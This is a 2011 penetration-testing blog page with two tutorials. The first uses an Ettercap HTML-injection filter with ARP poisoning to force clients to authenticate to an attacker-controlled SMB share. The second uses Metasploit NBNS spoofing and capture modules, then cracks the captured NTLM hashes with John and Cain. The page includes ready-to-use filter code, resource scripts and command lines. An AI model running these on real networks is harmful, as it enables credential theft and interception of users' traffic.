Showing posts with label nbns spoofing ntlmv1 ntlmv2 cracking netbios. Show all posts
Showing posts with label nbns spoofing ntlmv1 ntlmv2 cracking netbios. Show all posts

Tuesday, 1 November 2011

Using Ettercap to improve NetBIOS attacks

For those of you that have tried out NetBIOS spoofing, (explained Here), you know how devastatingly effective this is on an internal network. There are however, times when good crackable hashes just don't seem to be passing your way. Maybe the network is quiet, or you are just getting NTLMv2 hashes that you just can't seem to crack. If only you could somehow force those XP clients to send over their user's LM hashes...
Well... it seems you can with Ettercap, and it works very well too.
One of the great things about Ettercap, is that you can do so much more with man-in-the-middle attacks versus Cain for instance. DNS spoofing, ARP spoofing, iframe injections and many more are possible with this tool. Today though we are going to use a custom filter in an attempt to force the clients, via some HTML injection,  to connect to a fake share on our machine so that we can then harvest their authentication hashes.

Remember, for this attack to work, you will need to be targetting wired clients on the network (unless they are using open or WEP wifi) as we will be actively changing their traffic, and this would not be possible on a WPA network due to the individual client encryption keys being used.

First of all you will need to setup metasploit...
Let's see if we can find some low hanging fruit (XP machines)

use auxiliary/scanner/smb/smb_version




Excellent some target XP machines. Make a note of these IP addresses as we will need to target these with Ettercap next.

Now we need to get out filter configured for Ettercap. As you can see from looking at the filter below, we will be adding in an HTML tag into the web pages that the target will be viewing. This tag will tell the browser that it needs to load an image to display on the page and to load it from a share on your IP.
The image wont be there, but Metasploit will capture these requests, spoof the challenge, and capture the user's hash.

Modify the following filter to your own IP address, and save this as netbios.filter.



 if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Rubbish!")) {
      replace("Accept-Rubbish!", "Accept-gnidocnE");
      msg("Encoding Taken Care Of...\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("head>", "head> <img src=\"\\\\192.168.20.10\\pixel.gif\"> ");
msg("Replacement Filter Ran.\n");
}


Next, we need to install Ettercap: apt-get install ettercap
then within the /usr/local/share/ettercap folder, run etterfilter /root/netbios.filter -o netbios.ef.
This will complile the filter into a format Ettercap can understand.

We now need to return to Metasploit and setup the netbios spoofing modules to be ready to capture the incoming hashes, you can use the following resource script to save time:


use auxiliary/server/capture/smb
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
run
use auxiliary/server/capture/http_ntlm
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
set uripath /share
set srvport 80
run
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.20.10
run

Once you have this running, we can now start ettercap:

ettercap -TqF netbios.ef -M arp:remote /192.168.20.26,29,30/ /<gatewayIP>/ -i eth0

This will fire up Ettercap in text mode (T) without verbose info (q) and with the netbios filter (F) using the arp spoofing method (M) against the 3 XP clients.

Once the users on these clients start browsing web pages, you should see a flurry of hashes coming your way :0)

Remember to press "q" once you have these hashes so that Ettercap will re-poison them to prevent any network drop-out.



Make sure you have permission first, and have fun folks!
Posted by at 1 comment:
Labels: ,

Thursday, 14 July 2011

NetBIOS / NBNS Spoofing For The Easy Win




Nowadays, modern operating systems use DNS as their preferred method for resolving names – especially within a domain environment. An overview of the methods in which Windows machines resolve names of other machines on the network is as follows

  1. Windows first looks in its local hosts file at c:\windows\system32\drivers\etc\
  2. It will then check its own DNS cache to see it has been recently resolved.
  3. If this fails, it will send a request over to its configured DNS server(s).
  4. If the DNS server cannot resolve it (and assuming the name is in the non-standard DNS format) the client will send the request to its configured WINS server (if specified).
  5. If at this point the client has still not received a reply, it will send out a series of NetBIOS broadcasts.
  6. Finally, if all else fails, it will look inside its LMHOSTS file at  c:\windows\system32\drivers\etc\

Looking through that list, you can see that our attack doesn’t come into play until the 5th stage; and you may well be thinking that all the planets need to be aligned in order for this to work, but you’ll be surprised how on a busy network, just how many hashes you can capture using this method. There are plenty of situations that can be present on the network that will cause a client PC to skip those first 4 steps, for instance:

  1. Clients that are running login scripts to map drives via the net use method.
  2. Laptops brought into the environment from other domains will be “polling” for their printers and other resources that won’t exist on the network will also send out broadcast requests.
  3. Mistyped URL’s such as googlecom will be rejected by the DNS server and as such, will need to be resolved via NetBIOS
  4. Modern browsers allow you to search via the address bar, and the browser needs to decide if the text is a host or a query. If the string has spaces, it is obviously a search request. If there are no spaces the browser doesn't know if we want a server named "youtube" or we want to search for youtube.

So, as you can see, we have plenty of cards up our sleeves :0)

NetBIOS uses a series of broadcasts and luckily for us, it provides very little verification as to who is sending back the replies, so anyone can falsely reply to say they are filesever01 for instance. The client will blindly trust this response, try to negotiate a NULL session and, if anonymous connections are disallowed, use the current user’s logon session in hashed format (NETNTLMv1 or NETNTLMv2) to authenticate to the filesever01 over SMB. Soon enough you, as an attacker, will have a nice list of users/hashes that you can feed into John the Ripper or Cain for cracking.


First, we need to set up a couple of Metasploit auxiliary modules to capture these hashes - the SMB and HTTP_NTLM modules.

 Figure 1 - auxiliary/server/capture/smb

Figure 2 - auxiliary/server/capture/http_ntlm

Set the SRVHOST to your own IP address and make sure the other settings are configured like the ones above.
Once these are up and running, we need to setup one more module to send out spoofed responses to our targets.
 Figure 3 - auxiliary/spoof/nbns_response
It’s a good idea to create a Metasploit resource file to automate all this to make life easier. Just create a text file and start adding in the commands on-by-one as you would type them in the Metasploit console:

Once complete, type into the console: resource /root/nbnsspoof.txt to get it started.
Depending upon the target operating 
systems, you should see a couple of different types of hashes being captured now – NTLMv1 (XP, Server 2003, Windows 2000) and NTLMv2 (Vista, Windows7).
Ideally, we would like to be seeing NTLMv1 hashes appearing now as they can be cracked much easier with rainbow tables. Now we can sit back and wait. 

 Figure 4 - Hashes from XP clients

Figure 5 - Hashes from Windows 7 clients

Above, you can see we have managed to capture some hashes from both XP and Windows 7 clients, so now we need to start cracking them.

Cracking NTLMv1 Hashes –

 
NTLMv1 hashes are produced as follows:
1.     The server issues an 8 byte challenge to the client
2.     The client uses the challenge to encrypt it’s LM or NTLM hash
3.     The client passes this back to the server, where-by the reverse is performed to read the hash. 
  
 It’s in step 1 where a lot of this technique comes into play; you will notice in figures 44 and 45 that we can set a static challenge of 1122334455667788. Providing we always specify the same challenge, then that in effect removes the “salt”, which makes cracking these a lot easier as now, we can use pre-computed rainbow tables.

Both John the Ripper and Cain can be used to crack these hashes, NTLMv1 hashes contain the weaker LANMAN hash, so providing you have a good set of wordlists and tables, you should be able to crack these relatively easily.
To use John against these, you need to manually choose the format and make sure you are pointing it at the correct file - it should start with /tmp/john_netntlm

You can now choose to crack the NThashes – this can be quicker for derivatives of the word “password” or other weaker passwords longer than 7 characters.


Or, you can crack half of the LM hash (first 7 letters) by choosing nethalflm format. This is best for short passwords or for those that you cannot get easily with the netntlm method.

As you can see, we only have the first 7 characters of the passwords, but you will find a handy perl script within the john directory called netntlm.pl.
This script will take the first 7 letters and brute force the remainder of the password for you. The syntax is as follows –
perl netntlm.pl --seed="LONDON2" –-file=/tmp/john_netntlm

Unfortunately, this script can only run against a single seed at a time so you won’t get any bulk cracking done here, but as you can now see below, we have the uppercase version of Jane’s password.

We now need to get the case of the password, and this can be done simply by running the same command again.


Another way to do all this is to use Cain. You will need to download the HalfLM tables first - which are available here: http://www.freerainbowtables.com/en/tables/
You will then need to copy and paste the hashes from the cain output file into a text file and import them into Cain:

 Figure 6 - Importing hashes into Cain

Then choose the HALFLM + challenge method and load in your HalfLM tables to begin cracking.


 And now we are ready to start:

As you can see from above, Cain has started to crack many more of the passwords than john did. All we need to do now is to get the second half of the password.
For this, we need to use the Brute-force method within Cain – as follows:


Within seconds usually, we will now have just about all of the passwords cracked



Cracking NTLMv2 Hashes –

NTLMv2 hashes are sent by default on Vista or later operating systems, and are produced a little different from the NTLMv1 types, in that, the challenge is performed from both parties involved, and more factors are included to make up the salt – such as the username and the domain name. Basically, this means that we can no longer use rainbow tables. No matter though, as long as people choose weak passwords then we can easily get them.
John can be used against these by specifying the format=netntlmv2 argument:


And Cain can also be used here, but a little more work is involved because the Metasploit capture modules do not output these in Cain format for some reason.
You need to copy and paste the john format of the hash into Cain’s hash file located at C:\Program Files (x86)\Cain\NTLMv2.lst and re-arrange the format into the following:
Username<tab>domain<tab><tab>hash<tab>serverchallenge<tab>clientchallenge<tab><tab>
The easiest way of remembering this is to have Cain open (must be closed before saving) and use a tab where you see a column within the gui interface:


 

So, for those of you who have not yet tried this, I am willing to bet that it will become an essential part of your testing; as you may well find, it can really give you that jump-start into the network.
In fact it's so successful, it almost seems unfair, especially if you couple this along with the technique described here http://www.anotherwayin.net/2011/11/using-ettercap-to-improve-netbios.html?utm_source=BP_recent
you wont come across many networks that aren't susceptible to this.


** 2013 update**

Things have moved on a little since I posted this, and a couple of new tools now exist to make this attack even more successful . Firstly, newer OS's have IPv6 turned on by default, and this changes the order that windows uses to resolve names slightly. Whereas IPv4 only clients - such as XP etc. use DNS first then NBNS; IPv6 clients will use DNS, then Local Link Multicast Name Resolution (LLMNR), then NBNS.
Metasploit now has a module for this called llmnr_response, so I recommend you include this within your resource file to increase your success rate when running these attacks on modern networks.

In addition to this, a tool was released last year called Responder that includes all these attacks, plus  WPAD poisoning, NTLMv1 downgrading, ICMP redirection and many more. It also has better safety measures in place to minimize disruptions on the network. So get out of here, and go check it out :)

Posted by at 8 comments:
Labels: ,
Subscribe to: Posts (Atom)